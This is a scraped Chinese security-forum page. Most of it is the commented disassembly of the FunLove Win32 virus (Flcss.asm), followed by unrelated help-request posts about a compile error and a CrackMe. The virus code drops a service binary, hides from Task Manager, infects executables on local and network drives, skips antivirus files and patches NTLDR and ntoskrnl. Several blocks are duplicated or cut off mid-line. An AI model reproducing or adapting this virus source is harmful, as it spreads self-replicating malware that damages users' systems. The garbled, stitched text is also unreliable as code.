[求助]请教这段汇编。。谁能指点迷津?!
[QUOTE=;]...[/QUOTE] FUNLOVE的源代码 Flcss.asm ; ; disasm by Code Demon ; ; Code Demon Virus Dreaming Factory ; ;********************************************************************************************* .586 ASSUME CS:CODE,DS:CODE CODE SEGMENT USE32 VSize equ offset VEnd - VStart Phys_VSize equ 1000 main: ;********************************************************************************************* ; 开始代码 ;********************************************************************************************* VStart: call GetDelta ;此子程序用于取得病毒在内存中的开始地址,是绝大 ;多数病毒都要用到的经典技术只一,对于写一些加密 ;的软件有很大的帮助,莱鸟必看 lea esi,[offset HostCode + ebx] mov edi,[esp] sub edi,08 mov [esp],edi movsd movsd push dword ptr [esp + 04] call RelocKernel32 ;重定位Kernel32 or eax,eax jz short Exit cmp byte ptr [offset OS + ebx],00;判断操作系统的类型 jnz short NT_Srv call Create9xProcess ;建立WIN9X进程 ret NT_Srv: call CreateNTService ;建立NT服务 Exit: ret ;********************************************************************************************* ;建立NT服务的子程序 ;********************************************************************************************* CreateNTService: call RelocAdvapi32 or eax,eax jz short CNT_Failed push 02 push 00 push 00 ; 取服务管理器的句柄 call OpenSCManagerA or eax,eax jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable ;建立FLCSS.EXE, or eax,eax ; 已经驻留内存就退出. 
jz short CNT_Exit mov edi,0F01FF lea esi,offset [Service + ebx] push edi push esi push SCM_Handle call OpenServiceA or eax,eax jnz short CNT_Run xor eax,eax push eax push eax push eax push eax push eax lea eax,[offset Buffer1 + ebx] ; flcss.exe push eax push 01 ;错误代码 push 02 ; 开始 push 20 ; 类型 push edi push 00 push esi push SCM_Handle ;句柄 call CreateServiceA ;建立服务 or eax,eax jz short CNT_Failed CNT_Run: push 00 push 00 push eax call StartServiceA ;开始服务 or eax,eax jnz short CNT_Exit CNT_Failed: call StartInfectionThread ;传染子程序 CNT_Exit: ret ;********************************************************************************************* ;建立WIN9X进程的子程序 ;********************************************************************************************* Create9xProcess: ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. call CreateExecutable or eax,eax jz short P9x_Exit P9x_00: xor eax,eax lea edi,[offset Buffer2 + ebx] push edi push edi mov ecx,040 repz stosd mov cl,06 push eax loop $ - 1 lea esi,[offset Buffer1 + ebx] push esi push 00 call CreateProcessA ;创建进程 or eax,eax jnz short P9x_Exit P9x_Failed: call StartInfectionThread;传染子程序 P9x_Exit: ret **************************************************************************** ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. 
**************************************************************************** CreateExecutable: lea edi,[offset Buffer1 + ebx] push edi push 104 push edi call GetSystemDirectoryA ;取得系统目录 add edi,eax mov al,‘\‘ stosb lea esi,[offset Process + ebx] movsd movsd movsd push 02 call OpenFile cmp eax,-1 jz short CE_Exit mov c_FileHandle,eax lea edi,[offset VImports + ebx] ;清除 import mov eax,-1 stosd stosd lea edi,[offset Kernel32_Relocated + ebx] ;第二个 import mov eax,[edi - 8] stosd push 00 lea esi,c_BytesWritten push esi push 0200 push ebx push c_FileHandle call WriteFile ; 写文件头 push 00 push esi push 1000 push ebx push c_FileHandle call WriteFile ; 写入病毒主体 push c_FileHandle call CloseHandle ;关闭文件 CE_Exit: inc eax ret ;************************************************************************************ ;以下应该是病毒的服务程序 ;************************************************************************************ VService: call GetDelta push dword ptr [esp] call RelocKernel32 or eax,eax jz VS_Exit cmp byte ptr [offset OS + ebx],00 ;操作系统的类型 jz short W9x_Service_Register ;注册WIN9X服务 WNT_Service_Hacknowledge: call RelocAdvapi32 ;重定位Advapi32 or eax,eax jz VS_Exit lea esi,[offset Buffer1 + ebx] xor eax,eax lea ecx,[offset Service + ebx] lea edx,[offset ServiceDispatcher + ebx] mov [esi],ecx mov [esi + 04],edx mov [esi + 08],eax mov [esi + 0C],eax ; 将控制权返回给调用者 push esi call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[offset USER32_Name + ebx] push esi call LoadLibraryA lea esi,[offset RegisterClassA+ ebx] push esi push eax call GetProcAddress ;取进程的地址 or eax,eax jz short VS_00 mov [esi - 06],eax lea esi,[offset Buffer1 + ebx] mov edi,esi xor eax,eax mov ecx,0A repz stosd mov dword ptr [esi + 04],-1 mov dword ptr [esi + 10],400000 ; WINDOWS9X的基址 lea eax,[offset Service + ebx] mov [esi + 24],eax push esi call RegisterClassA ; 这里非常重要 lea esi,[offset RegisterServiceProcess+ ebx] push esi push dword ptr [offset Kernel32_Base + ebx] call GetProcAddress or eax,eax jz short VS_00 mov [esi 
- 06],eax call GetCurrentProcessId ;取当前进程的ID ; 注册为服务 call GetCurrentProcessId ;取当前进程的ID ; 注册为服务进程,防止被用户 push 01 ;用CTRL+ALR+DEL从任务管理器中发现 push eax call RegisterServiceProcess push 8000 ; 延时 call Sleep VS_00: call StartInfectionThread VS_Exit: ret ;********************************************************************************************* ;NT服务子程序 ;********************************************************************************************* ServiceDispatcher: call GetDelta lea esi,[offset ServiceHandler + ebx] lea edi,[offset Service + ebx] push esi push edi call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[offset Buffer1 + ebx] mov edi,esi mov ecx,06 xor eax,eax repz stosd mov dword ptr [esi],10 mov dword ptr [esi + 04],04 mov dword ptr [esi + 08],07 push esi push Service_Handle ;告诉WINDOWS服务已经正确的运行 call SetServiceStatus push 8000 call Sleep call StartInfectionThread ;建立进程 ret ServiceHandler: ret ; 当管理员关闭服务时,提示系统出错!好东西!!! ;********************************************************************************************* ;此子程序用于建立线程 ;********************************************************************************************* StartInfectionThread: call GetTickCount mov [offset Rand + ebx],eax lea eax,ThreadId push eax push 0 push 0 lea eax,[offset VThread + ebx] push eax push 0 push 0 call CreateThread ret ;********************************************************************************************* ; 病毒线程 ;********************************************************************************************* VThread: call GetDelta call InfectDrives ;感染本地文件 push 60000 call Sleep call GetRand and al,1F jnz short VThread call InfectNetwork ;感染网络文件 jmp short VThread ;******************************************************************************** ; 通过网络传染的子程序,值得借鉴 ;******************************************************************************** InfectNetwork: lea eax,[offset MPR_Name + ebx] push eax call LoadLibraryA or eax,eax jz short INet_Failed push eax lea 
esi,[offset MPR_Functions + ebx] push esi call DLL_Relocate or eax,eax jz short INet_Failed push 00 call NetSearch INet_Failed: ret ;********************************************************************************************* ; 此子程序用于测试驱动器是否有效 ;********************************************************************************************* InfectDrives: push esi call GetTickCount mov [offset Tick + ebx],eax lea esi,[offset Buffer1 + ebx] mov dword ptr [esi],‘ \:+ ebx - offset VStart‘ ID_TestDrive: mov byte ptr [esi + 03],00 push esi call GetDriveTypeA ;取驱动器类型 cmp al,03 ;硬盘? jz short ID_DriveOk cmp al,04 ;网络驱动器? jnz short ID_Invalid ID_DriveOk: add esi,03 push esi call BlownAway push esi call FileSearch ;查找文件 sub esi,03 ID_Invalid: mov al,[offset Buffer1 + ebx] inc al mov [offset Buffer1 + ebx],al cmp al,‘Z‘ jna short ID_TestDrive pop esi ret ;********************************************************************************************* ;查找计算机 ;********************************************************************************************* NetSearch : mov EnumBufferSize,4000 or EnumNB_Objects,-1 lea eax,WNetStructAddr push eax push WNetStructAddr push 0 push 0 push 2 call WNetOpenEnumA or eax,eax jnz NET_Close push 04 push 1000 push 4000 push 00 call VirtualAlloc or eax,eax jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize push eax push esi lea eax,EnumNB_Objects push eax push WNetStructAddr call WNetEnumResourceA or eax,eax jnz short NET_Free mov ecx,EnumNB_Objects or ecx,ecx jz short NET_00 NET_01: push ecx push esi mov esi,[esi + 14] ; 计算机名 or esi,esi jz short NET_03 cmp word ptr [esi],0041 ; 是否为软盘 jz short NET_03 lea edi,[offset Buffer1 + ebx] NET_02: movsb cmp byte ptr [esi],00 jnz short NET_02 mov al,‘\‘ stosb push edi call BlownAway push edi call FileSearch NET_03: pop esi mov eax,[esi + 0C] and al,2 cmp al,2 jnz short NET_04 push esi call NetSearch NET_04: add esi,20 pop ecx loop NET_01 jmp short NET_00 NET_Free: push 
8000 push 00 push EnumBufferAddr call VirtualFree NET_Close: push WNetStructAddr call WNetCloseEnum ret ;************************************************************************************* ; 查找文件子程序,这些跟以前DOS下没什么区别, ; ; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽! ^_^ ;************************************************************************************* FileSearch: mov eax,CurrentDirEnd mov dword ptr [eax],002A2E2A ; *.* lea edi,[offset Buffer2 + ebx] lea esi,[offset Buffer1 + ebx] push edi push esi call FindFirstFileA ;找第一个文件 cmp eax,-1 jz short RS_Exit RS_00: mov SearchHandle,eax RS_01: test byte ptr [edi],10 ; 测试是目录还是文件 jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],‘.‘ jz short RS_Next mov esi,edi add esi,2C mov edi,CurrentDirEnd RSD_00: movsb cmp byte ptr [esi],0 jnz short RSD_00 mov al,‘\‘ stosb push edi call FileSearch RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHand RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHandle call FindClose RS_Exit: ret ;******************************************************************** ;没什么新意,略过吧 ;******************************************************************** FileTest: mov edx,[edi + 2C] or edx,20202020 xor edx,61F81F61 lea esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染 mov ecx,0C FT_00: lodsd cmp edx,eax jz short FT_Exit loop FT_00 ;************************************************************************ ;注意拉, ;************************************************************************ mov esi,edi add esi,2C FT_01: lodsb or al,al jnz short FT_01 mov eax,[esi - 4] ; 扩展名判断 or eax,20202020 cmp eax,‘ xco‘ ;控件 jz short FT_02 cmp eax,‘ rcs‘ ;屏幕保护文件 jz short FT_02 cmp eax,‘ exe‘ ;标准的EXE文件 jnz short FT_Exit FT_02: mov eax,[edi + 20] ; 文件小于2000的就不感染 cmp eax,2000 jc short FT_Exit cmp al,03 ; 检测是否已经感染 jz short FT_Exit lea esi,[offset Buffer1 + ebx] ; 取文件名和路径 lea 
edi,[offset Buffer3 + ebx] push edi mov ecx,CurrentDirEnd sub ecx,esi repz movsb lea esi,[offset Buffer2 + ebx] add esi,2C FT_03: movsb cmp byte ptr [esi - 1],0 jnz short FT_03 call InfectFile ;干活了, FT_Exit: jmp RS_Next ;***************************************************************************************** ;感染文件子程序 ;***************************************************************************************** InfectFile: push i_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz IN_Exit mov i_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小,用于以后还原 mov i_FileSize,eax cmp al,03 ; 是否感染 jz IN_Exit lea edi,[offset Buffer3 + ebx] push 00 lea esi,i_BytesRead push esi push 2000 push edi push i_FileHandle call ReadFile ;********************************************************************************* ;以下的程序跟文件头有关,建议没基础者找一些相关资料看看 ;********************************************************************************* cmp word ptr [edi],5A4Dh ;DOS文件头,开始有点印象了吧 jnz IN_CloseFile cmp word ptr [edi + 18],0040 ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件 jnz IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; DOS文件头的大小 ja IN_CloseFile add edi,[edi + 3C] ;指向PE或NE文件头 mov eax,[edi] cmp eax,00004550 ;PE文件吗? jnz IN_CloseFile ;此步必须,因为WIN3.X的18H的值也大于等于40H cmp word ptr [edi + 5C],2 ; GUI???? 
jnz IN_CloseFile mov esi,edi add esi,18 add si,[edi + 14] ; 将ESI指向第一个节表 push esi mov eax,[edi + 28] ; 查找包含"PE"的节表 IN_00: mov ecx,[esi + 0C] add ecx,[esi + 08] cmp eax,ecx jc short IN_01 add esi,28 jmp short IN_00 IN_01: sub eax,[esi + 0C] add eax,[esi + 14] mov i_EP_Offset,eax or [esi + 24],80000000 ; 将它改为可写,这里是WINDOWS跟 ;DOS在程序和数据段上的一个重要改变 ;也是写WINDOWS病毒要注意的地方之一 pop esi xor ecx,ecx mov cx,[edi + 06] dec ecx mov eax,ecx mov edx,28 mul edx add esi,eax ; ESI指向最后一个节表 mov eax,[esi + 24] cmp al,80 ; 是否已经初始化 jz IN_CloseFile or eax,8C000000 ; 将它改为可写, and eax,not 12000000 ; 不共享,不可丢弃 mov [esi + 24],eax mov ecx,i_FileSize ;这里好象跟SFX有点关系 mov edx,ecx mov eax,ecx clc shr eax,03 sub edx,eax sub edx,[esi + 14] jc short IN_02 sub edx,[esi + 10] jnc IN_CloseFile IN_02: ; 重新计算节的长度 mov edx,[esi + 08] sub ecx,[esi + 14] jc short IN_03 cmp edx,ecx ja short IN_03 mov edx,ecx IN_03: test edx,00000FFF jz short IN_04 and edx,0FFFFF000 add edx,1000 IN_04: mov ecx,edx add ecx,[esi + 0C] mov eax,ecx add eax,4000 mov [edi + 50],eax ; 新的长度 sub ecx,[edi + 28] add ecx,offset VStart - 100 - 08 mov i_HostDep32,ecx mov eax,edx add eax,4000 ; 改变虚拟大小 mov [esi + 08],eax mov eax,edx add eax,[esi + 14] mov i_VirusOffset,eax add edx,1000 ; 改变物理大小 mov [esi + 10],edx add edx,[esi + 14] add edx,03 push i_FileHandle push edx call MapFile or eax,eax jz short IN_CloseFile mov i_MapHandle,eax push eax call ViewMap or eax,eax jz short IN_CloseMap mov edx,eax lea esi,[offset Buffer3 + ebx] ; 写PE文件头 mov edi,edx mov ecx,2000 repz movsb lea edi,[offset HostCode + ebx] mov esi,i_EP_Offset add esi,edx movsd movsd mov edi,esi ; 设置CALL GS:Virus sub edi,08 mov eax,00E8659090 stosd mov eax,i_HostDep32 stosd mov edi,edx mov eax,i_FileSize mov ecx,i_VirusOffset sub ecx,eax jna short IN_05 add edi,eax xor al,al repz stosb IN_05: mov esi,ebx ;写入病毒主体 mov edi,edx add edi,i_VirusOffset mov ecx,VSize repz movsb mov ecx,Phys_VSize - VSize + 3 repz stosb push edx call UnmapViewOfFile IN_CloseMap: push i_MapHandle call CloseHandle ;关闭 
call Wait_A_Little ;延时 IN_CloseFile: lea esi,[offset Buffer2 + 14 + ebx] ; 恢复文件的时间 push esi sub esi,08 push esi sub esi,08 push esi push i_FileHandle call SetFileTime push i_FileHandle call CloseHandle ;关闭文件 IN_Exit: ret ;******************************************************************************** ; 查找GetProcAddress 的子程序 ;******************************************************************************** Whereis_GPA: lea esi,[offset GPA_Sigs + ebx] mov byte ptr [offset OS + ebx],00 mov eax,w_Kernel32 and eax,0FFF00000 cmp eax,0BFF00000 jnz short OS_WinNT? OS_Win9x: mov edi,0BFF70000 jmp short WG_00 OS_WinNT?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077F00000 jnz short OS_Win2K? mov edi,eax jmp short WG_00 OS_Win2K?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077E00000 jnz short WG_Failed mov edi,077E80000 WG_00: mov edx,edi mov ecx,20000 WG_01: push ecx mov ecx,08 push esi push edi repz cmpsb pop edi pop esi pop ecx jz short WG_02 inc edi loop WG_01 WG_Failed: xor eax,eax jmp short WG_03 WG_02: add edi,03 mov [offset GetProcAddress + 1 + ebx],edi mov eax,edx mov [offset Kernel32_Base + ebx],eax WG_03: ret ;*************************************************************************************** ;DLL 重定位子程序 ;*************************************************************************************** DLL_Relocate: mov esi,DLL_Func DR_00: mov eax,esi add eax,07 push eax push DLL_Base call GetProcAddress or eax,eax jz short DR_03 DR_01: mov [esi + 1],eax add esi,07 DR_02: lodsb or al,al jnz short DR_02 cmp byte ptr [esi],0B8 jz short DR_00 DR_03: ret ;********************************************************************************************** ; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧 ;********************************************************************************************** BlownAway: lea esi,[offset NTLDR + ebx] mov edi,DirEnd movsd movsd lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTLDR + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_00 
add esi,10 BA_00: push edi push esi push 05 call PatchFile lea esi,[offset NTOSKRNL + ebx] mov edi,DirEnd BA_01: movsb cmp byte ptr [esi - 1],00 jnz short BA_01 lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTOSKRNL + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_02 add esi,18 BA_02: push edi push esi push 09 call PatchFile ret PatchFile: push p_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz short PA_Exit mov p_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小 mov p_FileSize,eax push p_FileHandle push eax call MapFile or eax,eax jz short PA_CloseFile mov p_MapHandle,eax push eax call ViewMap or eax,eax jz short PA_CloseMap mov edx,eax mov edi,eax mov esi,p_PatchAddr mov ecx,p_FileSize PA_00: push ecx push esi push edi mov ecx,p_PatchSize repz cmpsb pop edi pop esi pop ecx jz short PA_01 inc edi loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize add esi,ecx repz movsb PA_Unmap: push edx call UnmapViewOfFile PA_CloseMap: push p_MapHandle call CloseHandle PA_CloseFile: push p_FileHandle call CloseHandle ;关闭文件 PA_Exit: ret ;********************************************************************************************** ;此子程序用于取病毒在内存中的开始地址,经典技术 ;********************************************************************************************** GetDelta: call delta delta: pop ebx sub ebx,offset delta - VStart ret ;********************************************************************************************** ;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法 ;********************************************************************************************** RelocKernel32: push r_Kernel32 call Whereis_GPA or eax,eax jz short RK_00 push eax lea esi,[offset Kernel32_Functions + ebx] push esi call DLL_Relocate RK_00: ret ;********************************************************************************************** ; 以下是重定位Advapi32的子程序 ;********************************************************************************************** RelocAdvapi32: lea eax,[offset ADVAPI32_Name 
+ ebx] push eax call LoadLibraryA or eax,eax jz short RA_00 push eax lea esi,[offset ADVAPI32_Functions + ebx] push esi call DLL_Relocate RA_00: ret ;********************************************************************************************** ; 打开文件子程序 ;********************************************************************************************** OpenFile: push 20 push o_Filename call SetFileAttributesA push 00 push 80 ; 普通属性 push o_OpenMode push 00 push 00 ; 不共享, push 0C0000000 ; 读写方式 push o_Filename call CreateFileA ret ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileM ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileMappingA ret ViewMap: push 00 push 00 push 00 push 02 push v_MapHandle call MapViewOfFile ret ;********************************************************************************************** ; 延时,没什么说的了 ;********************************************************************************************** Wait_A_Little: call GetTickCount sub eax,[offset Tick + ebx] cmp eax,4000 jc short WAL_00 push 16000 call Sleep call GetTickCount mov [offset Tick + ebx],eax WAL_00: ret GetRand: push ecx push edx mov eax,[offset Rand + ebx] xor edx,edx mov ecx,7FFFFFFF mul ecx inc eax mov ecx,0FFFFFFFBh div ecx mov eax,edx mov [offset Rand + ebx],eax pop edx pop ecx ret ;********************************************************************************************** ;以下是一些数据 ;********************************************************************************************** HostCode db 8 
dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2 NT4 db 0C2,04,00,55,8Bh,4C,24,0C W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db ‘NTLDR‘,0 NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志 db 3Bh,46,58,0EBh,07 W2K_NTLDR db 3Bh,47,58,74,07 db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志 NTOSKRNL db ‘WINNT\System32\ntoskrnl.exe‘,0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志 db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上 db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 ;********************************************************************************************** ;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字, ;********************************************************************************************** SkipNames: dd 139D7300h ; aler dd 0F977200h ; amon dd 118E7E1Eh ; _avp dd 52886900h ; avp3 dd 0C886900h ; avpm dd 13883207h ; f-pr dd 168E7E0Fh ; navw dd 0F997C12h ; scan dd 128B7212h ; smss dd 04907B05h ; ddhe dd 00946F05h ; dpla dd 00946F0Ch ; mpla Process db ‘flcss.exe‘,0 Service db ‘FLC‘,0 ; Import节表 VImports: dd offset Kernel32_Pointers dd -1,-1 dd offset Kernel32_Name dd offset Kernel32_Relocated db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep Kernel32_Relocated dd offset Kernel32_Beep Kernel32_Beep db ?,?,‘Beep‘,0 ;********************************************************************************************* ; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了, ; ; 注: 绝顶高手--------没有头发的高手 ;********************************************************************************************* Kernel32_Name db ‘KERNEL32.dll‘,0 Kernel32_Functions: CloseHandle: db 0B8,4 dup(?),0FF,0E0,‘CloseHandle‘,0 CreateFileA: db 0B8,4 dup(?),0FF,0E0,‘CreateFileA‘,0 CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,‘CreateFileMappingA‘,0 CreateProcessA: db 0B8,4 dup(?),0FF,0E0,‘CreateProcessA‘,0 CreateThread: db 0B8,4 dup(?),0FF,0E0,‘CreateThread‘,0 FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,‘FindFirstFileA‘,0 FindNextFileA: db 0B8,4 dup(?),0FF,0E0,‘FindNextFileA‘,0 FindClose: db 0B8,4 
dup(?),0FF,0E0,‘FindClose‘,0 GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,‘GetCurrentProcessId‘,0 GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,‘GetDriveTypeA‘,0 GetFileSize: db 0B8,4 dup(?),0FF,0E0,‘GetFileSize‘,0 GetProcAddress: db 0B8,4 dup(?),0FF,0E0,‘GetProcAddress‘,0 GetTickCount: db 0B8,4 dup(?),0FF,0E0,‘GetTickCount‘,0 GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,‘GetSystemDirectoryA‘,0 LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,‘LoadLibraryA‘,0 MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,‘MapViewOfFile‘,0 ReadFile: db 0B8,4 dup(?),0FF,0E0,‘ReadFile‘,0 SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,‘SetFileAttributesA‘,0 SetFileTime: db 0B8,4 dup(?),0FF,0E0,‘SetFileTime‘,0 Sleep: db 0B8,4 dup(?),0FF,0E0,‘Sleep‘,0 UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,‘UnmapViewOfFile‘,0 VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,‘VirtualAlloc‘,0 VirtualFree: db 0B8,4 dup(?),0FF,0E0,‘VirtualFree‘,0 WriteFile: db 0B8,4 dup(?),0FF,0E0,‘WriteFile‘,0 ;注:下面的API在WIN9X中是没有的 db 0 RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,‘RegisterServiceProcess‘,0 USER32_Name db ‘USER32.dll‘,0 RegisterClassA: db 0B8,4 dup(?),0FF,0E0,‘RegisterClassA‘,0 ADVAPI32_Name db ‘ADVAPI32.dll‘,0 ADVAPI32_Functions: OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,‘OpenSCManagerA‘,0 OpenServiceA: db 0B8,4 dup(?),0FF,0E0,‘OpenServiceA‘,0 CreateServiceA: db 0B8,4 dup(?),0FF,0E0,‘CreateServiceA‘,0 StartServiceA: db 0B8,4 dup(?),0FF,0E0,‘StartServiceA‘,0 StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,‘StartServiceCtrlDispatcherA‘,0 RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,‘RegisterServiceCtrlHandlerA‘,0 SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,‘SetServiceStatus‘,0 MPR_Name db ‘MPR.dll‘,0 MPR_Functions: WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,‘WNetOpenEnumA‘,0 WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,‘WNetEnumResourceA‘,0 WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,‘WNetCloseEnum‘,0 ;病毒应该是在这里就结束了 vend: Kernel32_Base dd ? Rand dd ? Tick dd ? OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; 此处应该是用于存放当前目录 Buffer2 db 200 dup (?) 
Buffer3 db 2000 dup (?) ;此处用于存放读入的文件 CODE ENDS END main -- ※ 来源:·安全焦点讨论区 www.xfocus.org· Trackback: http://tb.donews.net/TrackBack.aspx?PostId=705243 |
[求助]win32xp系统下用VISTUAL STUDIO 2005编译一段代码出现这样的错误:
引用答案: 在编译ACE工程的时候,总是出现error prj0003错误,找了好久终于得到解决方法。简单的方法:先关掉VS2005,然后到Documents and Settings目录查找VCComponents_v1.dat文件,将其删除,重启VS2005即可。 文章出处:http://www.diybl.com/course/4_webprogram/asp.net/asp_netshl/2008515/116073.html |
[求助]请教这段汇编。。谁能指点迷津?!
看来这个版块没人回答我。。我重发去win32/64汇编版块了。。请版主删了此贴吧。。 |
[求助]请教这段汇编。。谁能指点迷津?!
为什么没人回答啊~~~~~~ 没人帮我吗?。。 |
[求助]请帮我看下这个CrackMe
..哎.看到那个答案了..这么复杂..还要和32异或,再xor3次,真累..看的头晕 |
[求助]病毒程序中的问题。谢谢
咋没人帮我哦 看不懂程序好烦啊。 |